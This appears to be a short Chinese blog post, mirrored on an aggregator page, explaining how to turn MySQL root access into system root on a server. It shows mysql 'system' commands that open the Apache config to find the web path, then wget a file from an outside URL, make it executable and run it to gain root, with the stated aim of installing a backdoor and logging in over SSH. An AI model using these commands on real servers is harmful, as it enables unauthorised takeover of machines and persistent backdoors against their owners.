zoukankan      html  css  js  c++  java
  • mysql以ROOT权限提权方法

      今天feng问了一个问题,mysql root权限运行,直接root服务器吧,SSH登录

    正好上网查一下相关的资料:

     
    mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内。

    按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是 按照我的的方法,没有必要再去找web路径了,直接执行

    mysql>system vi /etc/httpd/conf/httpd.conf;

    直接这样就可以找到web的路径,当然,我们的目的并不是找web路径,放webshell进去。我们是要来做其他的事情,比如,下载exp执行, 搞到 root权限,然后装后门虾米的

    mysql>system wget http://www.baidu.org.tw/xxxx ;

    mysql>system chmod +x xxxx;

    mysql>system ./xxxx;

    这样mysql的root此时就成为system的root了,剩下的事情,如果开了ssh,就ssh上去,输入mysql的用户密码,ok,搞定。

    相关资料:

    http://www.linuxidc.com/Linux/2010-12/30787.htm

    http://www.waitalone.cn/mysql-tiquan-summary.html?replytocom=390

  • 相关阅读:
    bzoj 1017 魔兽地图DotR
    poj 1322 chocolate
    bzoj 1045 糖果传递
    poj 3067 japan
    timus 1109 Conference(二分图匹配)
    URAL 1205 By the Underground or by Foot?(SPFA)
    URAL 1242 Werewolf(DFS)
    timus 1033 Labyrinth(BFS)
    URAL 1208 Legendary Teams Contest(DFS)
    URAL 1930 Ivan's Car(BFS)
  • 原文地址:https://www.cnblogs.com/sevck/p/5583004.html
Copyright © 2011-2022 走看看